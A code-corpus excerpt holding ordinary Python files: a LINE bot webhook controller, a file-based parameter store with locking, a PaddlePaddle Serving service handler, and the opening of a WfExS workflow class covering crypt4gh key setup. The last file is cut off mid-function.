source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
controllers.py | # Module for server
from flask import request, abort
# Module for Line SDK
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, JoinEvent,
MemberJoinedEvent, MemberLeftEvent,
UnfollowEvent, FollowEvent,PostbackEvent
)
# Module for event handler
from event import (message,join,postback)
# Module for delay
from time import sleep
# Module for logging
import logging
# Module for multi-threading
import threading
# Homepage content
def index():
return "<h1> Apa? </h1>"
# Line bot handler
def handler(app,parser,line_bot_api):
# Header for Line application
signature = request.headers['X-Line-Signature']
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
# Get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# Parse webhook body
try:
events = parser.parse(body, signature)
except InvalidSignatureError:
abort(400)
# Multi threading
sleep(0.01)
thread = threading.Thread(target=eventHandler, args=[app, events,line_bot_api])
thread.start()
return 'OK'
def eventHandler(app, events, line_bot_api):
for event in events:
if isinstance(event, MessageEvent):
message.MessageHandler(event, line_bot_api)
elif isinstance(event, JoinEvent):
join.JoinHandler(event, line_bot_api)
elif isinstance(event, PostbackEvent):
postback.PostbackHandler(event, line_bot_api)
|
params.py | #!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
CLEAR_ON_CAR_START = 4
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.PERSISTENT],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_CAR_START], #[TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT], #[TxType.CLEAR_ON_CAR_START],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT], #[TxType.PERSISTENT], #[TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsRHD": [TxType.PERSISTENT],
"IsUpdateAvailable": [TxType.PERSISTENT],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"IsUploadVideoOverCellularEnabled": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db='/data/params'):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def car_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_CAR_START)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(ord(c) < 128 and ord(c) >= 32 for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, pp.encode("hex")))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
local_service_handler.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
#from paddle_serving_server_gpu import OpMaker, OpSeqMaker
#from paddle_serving_server_gpu import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor
_LOGGER = logging.getLogger(__name__)
_workdir_name_gen = util.NameGenerator("workdir_")
class LocalServiceHandler(object):
"""
LocalServiceHandler is the processor of the local service, contains
three client types, brpc, grpc and local_predictor.If you use the
brpc or grpc, serveing startup ability is provided.If you use
local_predictor, local predict ability is provided by paddle_serving_app.
"""
def __init__(self,
model_config,
client_type='local_predictor',
workdir="",
thread_num=2,
device_type=-1,
devices="",
fetch_names=None,
mem_optim=True,
ir_optim=False,
available_port_generator=None,
use_profile=False):
"""
Initialization of localservicehandler
Args:
model_config: model config path
client_type: brpc, grpc and local_predictor[default]
workdir: work directory
thread_num: number of threads, concurrent quantity.
device_type: support multiple devices. -1=Not set, determined by
`devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu
devices: gpu id list[gpu], "" default[cpu]
fetch_names: get fetch names out of LocalServiceHandler in
local_predictor mode. fetch_names_ is compatible for Client().
mem_optim: use memory/graphics memory optimization, True default.
ir_optim: use calculation chart optimization, False default.
available_port_generator: generate available ports
use_profile: use profiling, False default.
Returns:
None
"""
if available_port_generator is None:
available_port_generator = util.GetAvailablePortGenerator()
self._model_config = model_config
self._port_list = []
self._device_name = "cpu"
self._use_gpu = False
self._use_trt = False
self._use_lite = False
self._use_xpu = False
if device_type == -1:
# device_type is not set, determined by `devices`,
if devices == "":
# CPU
self._device_name = "cpu"
devices = [-1]
else:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 0:
# CPU
self._device_name = "cpu"
devices = [-1]
elif device_type == 1:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 2:
# Nvidia Tensor RT
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
self._use_trt = True
elif device_type == 3:
# ARM CPU
self._device_name = "arm"
devices = [-1]
self._use_lite = True
elif device_type == 4:
# Kunlun XPU
self._device_name = "arm"
devices = [int(x) for x in devices.split(",")]
self._use_lite = True
self._use_xpu = True
else:
_LOGGER.error(
"LocalServiceHandler initialization fail. device_type={}"
.format(device_type))
if client_type == "brpc" or client_type == "grpc":
for _ in devices:
self._port_list.append(available_port_generator.next())
_LOGGER.info("Create ports for devices:{}. Port:{}"
.format(devices, self._port_list))
self._client_type = client_type
self._workdir = workdir
self._devices = devices
self._thread_num = thread_num
self._mem_optim = mem_optim
self._ir_optim = ir_optim
self._local_predictor_client = None
self._rpc_service_list = []
self._server_pros = []
self._use_profile = use_profile
self._fetch_names = fetch_names
_LOGGER.info(
"Models({}) will be launched by device {}. use_gpu:{}, "
"use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
"mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
"client_type:{}, fetch_names:{}".format(
model_config, self._device_name, self._use_gpu, self._use_trt,
self._use_lite, self._use_xpu, device_type, self._devices,
self._mem_optim, self._ir_optim, self._use_profile,
self._thread_num, self._client_type, self._fetch_names))
def get_fetch_list(self):
return self._fetch_names
def get_port_list(self):
return self._port_list
def get_client(self, concurrency_idx):
"""
Function get_client is only used for local predictor case, creates one
LocalPredictor object, and initializes the paddle predictor by function
load_model_config.The concurrency_idx is used to select running devices.
Args:
concurrency_idx: process/thread index
Returns:
_local_predictor_client
"""
#checking the legality of concurrency_idx.
device_num = len(self._devices)
if device_num <= 0:
_LOGGER.error("device_num must be not greater than 0. devices({})".
format(self._devices))
raise ValueError("The number of self._devices error")
if concurrency_idx < 0:
_LOGGER.error("concurrency_idx({}) must be one positive number".
format(concurrency_idx))
concurrency_idx = 0
elif concurrency_idx >= device_num:
concurrency_idx = concurrency_idx % device_num
_LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
concurrency_idx, device_num))
from paddle_serving_app.local_predict import LocalPredictor
if self._local_predictor_client is None:
self._local_predictor_client = LocalPredictor()
self._local_predictor_client.load_model_config(
model_path=self._model_config,
use_gpu=self._use_gpu,
gpu_id=self._devices[concurrency_idx],
use_profile=self._use_profile,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
use_trt=self._use_trt,
use_lite=self._use_lite,
use_xpu=self._use_xpu)
return self._local_predictor_client
def get_client_config(self):
return os.path.join(self._model_config, "serving_server_conf.prototxt")
def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
ir_optim):
"""
According to self._device_name, generating one Cpu/Gpu/Arm Server, and
setting the model config amd startup params.
Args:
workdir: work directory
port: network port
gpuid: gpu id
thread_num: thread num
mem_optim: use memory/graphics memory optimization
ir_optim: use calculation chart optimization
Returns:
server: CpuServer/GpuServer
"""
if self._device_name == "cpu":
from paddle_serving_server import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
else:
#gpu or arm
from paddle_serving_server_gpu import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
if gpuid >= 0:
server.set_gpuid(gpuid)
# TODO: support arm or arm + xpu later
server.set_device(self._device_name)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.load_model_config(self._model_config)
server.prepare_server(
workdir=workdir, port=port, device=self._device_name)
if self._fetch_names is None:
self._fetch_names = server.get_fetch_list()
return server
def _start_one_server(self, service_idx):
"""
Start one server
Args:
service_idx: server index
Returns:
None
"""
self._rpc_service_list[service_idx].run_server()
def prepare_server(self):
"""
Prepare all servers to be started, and append them into list.
"""
for i, device_id in enumerate(self._devices):
if self._workdir != "":
workdir = "{}_{}".format(self._workdir, i)
else:
workdir = _workdir_name_gen.next()
self._rpc_service_list.append(
self._prepare_one_server(
workdir,
self._port_list[i],
device_id,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim))
def start_server(self):
"""
Start multiple processes and start one server in each process
"""
for i, _ in enumerate(self._rpc_service_list):
p = multiprocessing.Process(
target=self._start_one_server, args=(i, ))
p.daemon = True
self._server_pros.append(p)
for p in self._server_pros:
p.start()
|
workflow.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020-2021 Barcelona Supercomputing Center (BSC), Spain
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import atexit
import http
import io
import json
import jsonschema
import logging
import pathlib
import platform
import shutil
import sys
import threading
import time
import types
import uuid
from pathlib import Path
from typing import List, Mapping, Pattern, Tuple, Union
from urllib import request, parse
from rocrate import rocrate
import bagit
# We have preference for the C based loader and dumper, but the code
# should fallback to default implementations when C ones are not present
try:
from yaml import CLoader as YAMLLoader, CDumper as YAMLDumper
except ImportError:
from yaml import Loader as YAMLLoader, Dumper as YAMLDumper
import yaml
import crypt4gh.lib
import crypt4gh.keys
from .common import *
from .encrypted_fs import *
from .engine import WorkflowEngine, WorkflowEngineException
from .engine import WORKDIR_WORKFLOW_META_FILE, WORKDIR_SECURITY_CONTEXT_FILE, WORKDIR_PASSPHRASE_FILE
from .engine import WORKDIR_MARSHALLED_STAGE_FILE, WORKDIR_MARSHALLED_EXECUTE_FILE, WORKDIR_MARSHALLED_EXPORT_FILE
from .engine import WORKDIR_INPUTS_RELDIR, WORKDIR_INTERMEDIATE_RELDIR, WORKDIR_META_RELDIR, WORKDIR_OUTPUTS_RELDIR, \
WORKDIR_ENGINE_TWEAKS_RELDIR
from .cache_handler import SchemeHandlerCacheHandler
from .utils.marshalling_handling import marshall_namedtuple, unmarshall_namedtuple
from .fetchers import DEFAULT_SCHEME_HANDLERS
from .fetchers.pride import SCHEME_HANDLERS as PRIDE_SCHEME_HANDLERS
from .fetchers.trs_files import INTERNAL_TRS_SCHEME_PREFIX, SCHEME_HANDLERS as INTERNAL_TRS_SCHEME_HANDLERS
from .nextflow_engine import NextflowWorkflowEngine
from .cwl_engine import CWLWorkflowEngine
# The list of classes to be taken into account
# CWL detection is before, as Nextflow one is
# a bit lax (only detects a couple of too common
# keywords)
WORKFLOW_ENGINE_CLASSES = [
CWLWorkflowEngine,
NextflowWorkflowEngine,
]
class WF:
"""
Workflow enaction class
"""
DEFAULT_PASSPHRASE_LENGTH = 4
CRYPT4GH_SECTION = 'crypt4gh'
CRYPT4GH_PRIVKEY_KEY = 'key'
CRYPT4GH_PUBKEY_KEY = 'pub'
CRYPT4GH_PASSPHRASE_KEY = 'passphrase'
TRS_METADATA_FILE = 'trs_metadata.json'
TRS_QUERY_CACHE_FILE = 'trs_result.json'
TRS_TOOL_FILES_FILE = 'trs_tool_files.json'
SCHEMAS_REL_DIR = 'schemas'
CONFIG_SCHEMA = 'config.json'
SECURITY_CONTEXT_SCHEMA = 'security-context.json'
STAGE_DEFINITION_SCHEMA = 'stage-definition.json'
DEFAULT_RO_EXTENSION = ".crate.zip"
DEFAULT_TRS_ENDPOINT = "https://dev.workflowhub.eu/ga4gh/trs/v2/" # root of GA4GH TRS API
TRS_TOOLS_PATH = 'tools/'
WORKFLOW_ENGINES = list(map(lambda clazz: clazz.WorkflowType(), WORKFLOW_ENGINE_CLASSES))
RECOGNIZED_TRS_DESCRIPTORS = dict(map(lambda t: (t.trs_descriptor, t), WORKFLOW_ENGINES))
@classmethod
def generate_passphrase(cls) -> str:
import random
from pwgen_passphrase.__main__ import generate_passphrase, list_wordlists, read_wordlist
wordlists_filenames = list_wordlists()
wordlists_tags = [*wordlists_filenames.keys()]
wordlist_filename = wordlists_filenames[wordlists_tags[random.randrange(len(wordlists_tags))]]
wordlist = read_wordlist(wordlist_filename).splitlines()
return generate_passphrase(wordlist, cls.DEFAULT_PASSPHRASE_LENGTH)
@classmethod
def bootstrap(cls, local_config, config_directory=None, key_prefix=None):
"""
:param local_config: Relevant local configuration, like the cache directory.
:param config_directory: The filename to be used to resolve relative paths
:param key_prefix:
:type local_config: dict
"""
import datetime
import socket
logger = logging.getLogger(cls.__name__)
updated = False
# Getting the config directory
if config_directory is None:
config_directory = os.getcwd()
if not os.path.isabs(config_directory):
config_directory = os.path.abspath(config_directory)
if key_prefix is None:
key_prefix = ''
# This one is to assure the working directory is created
workDir = local_config.get('workDir')
if workDir:
if not os.path.isabs(workDir):
workDir = os.path.normpath(os.path.join(config_directory, workDir))
os.makedirs(workDir, exist_ok=True)
# Now, checking whether public and private key pairs exist
numExist = 0
crypt4ghSect = local_config.get(cls.CRYPT4GH_SECTION)
if crypt4ghSect is None:
local_config[cls.CRYPT4GH_SECTION] = {}
crypt4ghSect = local_config[cls.CRYPT4GH_SECTION]
for elem in (cls.CRYPT4GH_PRIVKEY_KEY, cls.CRYPT4GH_PUBKEY_KEY):
fname = crypt4ghSect.get(elem)
# The default when no filename exist is creating hidden files in the config directory
if fname is None:
fname = key_prefix + '.' + elem
crypt4ghSect[elem] = fname
updated = True
if not os.path.isabs(fname):
fname = os.path.normpath(os.path.join(config_directory, fname))
if os.path.exists(fname):
if os.path.getsize(fname) == 0:
logger.warning("[WARNING] Installation {} file {} is empty".format(elem, fname))
else:
numExist += 1
else:
logger.warning("[WARNING] Installation {} file {} does not exist".format(elem, fname))
if numExist == 1:
raise WFException("Inconsistent {} section, as one of the keys is missing".format(cls.CRYPT4GH_SECTION))
# Time to generate the pairs needed to work with crypt4gh
if numExist == 0:
privKey = crypt4ghSect[cls.CRYPT4GH_PRIVKEY_KEY]
if not os.path.isabs(privKey):
privKey = os.path.normpath(os.path.join(config_directory, privKey))
pubKey = crypt4ghSect[cls.CRYPT4GH_PUBKEY_KEY]
if not os.path.isabs(pubKey):
pubKey = os.path.normpath(os.path.join(config_directory, pubKey))
if cls.CRYPT4GH_PASSPHRASE_KEY not in crypt4ghSect:
passphrase = cls.generate_passphrase()
crypt4ghSect[cls.CRYPT4GH_PASSPHRASE_KEY] = passphrase
updated = True
else:
passphrase = crypt4ghSect[cls.CRYPT4GH_PASSPHRASE_KEY]
comment = 'WfExS crypt4gh keys {} {} {}'.format(socket.gethostname(), config_directory,
datetime.datetime.now().isoformat())
crypt4gh.keys.c4gh.generate(privKey, pubKey, passphrase=passphrase.encode('utf-8'),
comment=comment.encode('utf-8'))
return updated, local_config
@classmethod
def FromDescription(cls, workflow_meta, local_config, creds_config=None, config_directory=None):
"""
:param workflow_meta: The configuration describing both the workflow
and the inputs to use when it is being instantiated.
:param local_config: Relevant local configuration, like the cache directory.
:param creds_config: Dictionary with the different credential contexts (to be implemented)
:param config_directory:
:type workflow_meta: dict
:type local_config: dict
:type creds_config: dict
:type config_directory:
:return: Workflow configuration
"""
if creds_config is None:
creds_config = {}
_, updated_local_config = cls.bootstrap(local_config, config_directory=config_directory)
return cls(
local_config,
config_directory=config_directory
).newSetup(
workflow_meta['workflow_id'],
workflow_meta.get('version'),
descriptor_type=workflow_meta.get('workflow_type'),
trs_endpoint=workflow_meta.get('trs_endpoint', cls.DEFAULT_TRS_ENDPOINT),
params=workflow_meta.get('params', {}),
outputs=workflow_meta.get('outputs', {}),
workflow_config=workflow_meta.get('workflow_config'),
creds_config=creds_config
)
@classmethod
def ConfigValidate(cls, configToValidate, relSchemaFile):
# Locating the schemas directory, where all the schemas should be placed
schemaFile = os.path.join(os.path.dirname(__file__), cls.SCHEMAS_REL_DIR, relSchemaFile)
try:
with open(schemaFile, mode="r", encoding="utf-8") as sF:
schema = json.load(sF)
jv = jsonschema.validators.validator_for(schema)(schema)
return list(jv.iter_errors(instance=configToValidate))
except Exception as e:
raise WFException(f"FATAL ERROR: corrupted schema {relSchemaFile}. Reason: {e}")
def __init__(self, local_config=None, config_directory=None):
"""
Init function
:param local_config: Local setup configuration, telling where caching directories live
:type local_config: dict
"""
# Getting a logger focused on specific classes
self.logger = logging.getLogger(self.__class__.__name__)
if not isinstance(local_config, dict):
local_config = {}
# validate the local configuration object
valErrors = self.ConfigValidate(local_config, self.CONFIG_SCHEMA)
if len(valErrors) > 0:
self.logger.error(f'ERROR in local configuration block: {valErrors}')
sys.exit(1)
self.local_config = local_config
toolSect = local_config.get('tools', {})
self.git_cmd = toolSect.get('gitCommand', DEFAULT_GIT_CMD)
encfsSect = toolSect.get('encrypted_fs', {})
encfs_type = encfsSect.get('type', DEFAULT_ENCRYPTED_FS_TYPE)
try:
encfs_type = EncryptedFSType(encfs_type)
except:
raise WFException('Invalid default encryption filesystem {}'.format(encfs_type))
if encfs_type not in ENCRYPTED_FS_MOUNT_IMPLEMENTATIONS:
raise WFException('FIXME: Default encryption filesystem {} mount procedure is not implemented')
self.encfs_type = encfs_type
self.encfs_cmd = shutil.which(encfsSect.get('command', DEFAULT_ENCRYPTED_FS_CMD[self.encfs_type]))
self.fusermount_cmd = encfsSect.get('fusermount_command', DEFAULT_FUSERMOUNT_CMD)
self.encfs_idleMinutes = encfsSect.get('idle', DEFAULT_ENCRYPTED_FS_IDLE_TIMEOUT)
# Getting the config directory, needed for relative filenames
if config_directory is None:
config_directory = os.getcwd()
if not os.path.isabs(config_directory):
config_directory = os.path.abspath(config_directory)
self.config_directory = config_directory
# Getting the private and public keys, needed from this point
crypt4ghSect = local_config.get(self.CRYPT4GH_SECTION, {})
privKeyFilename = crypt4ghSect[self.CRYPT4GH_PRIVKEY_KEY]
if not os.path.isabs(privKeyFilename):
privKeyFilename = os.path.normpath(os.path.join(config_directory, privKeyFilename))
pubKeyFilename = crypt4ghSect[self.CRYPT4GH_PUBKEY_KEY]
if not os.path.isabs(pubKeyFilename):
pubKeyFilename = os.path.normpath(os.path.join(config_directory, pubKeyFilename))
passphrase = crypt4ghSect[self.CRYPT4GH_PASSPHRASE_KEY]
# These are the keys to be used
self.pubKey = crypt4gh.keys.get_public_key(pubKeyFilename)
self.privKey = crypt4gh.keys.get_private_key(privKeyFilename, lambda: passphrase)
# This directory will be used to cache repositories and distributable inputs
cacheDir = local_config.get('cacheDir')
if cacheDir:
if not os.path.isabs(cacheDir):
cacheDir = os.path.normpath(os.path.join(config_directory, cacheDir))
os.makedirs(cacheDir, exist_ok=True)
else:
cacheDir = tempfile.mkdtemp(prefix='WfExS', suffix='backend')
# Assuring this temporal directory is removed at the end
atexit.register(shutil.rmtree, cacheDir)
# Setting up caching directories
self.cacheDir = cacheDir
self.cacheWorkflowDir = os.path.join(cacheDir, 'wf-cache')
os.makedirs(self.cacheWorkflowDir, exist_ok=True)
self.cacheROCrateDir = os.path.join(cacheDir, 'ro-crate-cache')
os.makedirs(self.cacheROCrateDir, exist_ok=True)
self.cacheTRSFilesDir = os.path.join(cacheDir, 'trs-files-cache')
os.makedirs(self.cacheTRSFilesDir, exist_ok=True)
self.cacheWorkflowInputsDir = os.path.join(cacheDir, 'wf-inputs')
os.makedirs(self.cacheWorkflowInputsDir, exist_ok=True)
# This directory will be used to store the intermediate
# and final results before they are sent away
workDir = local_config.get('workDir')
if workDir:
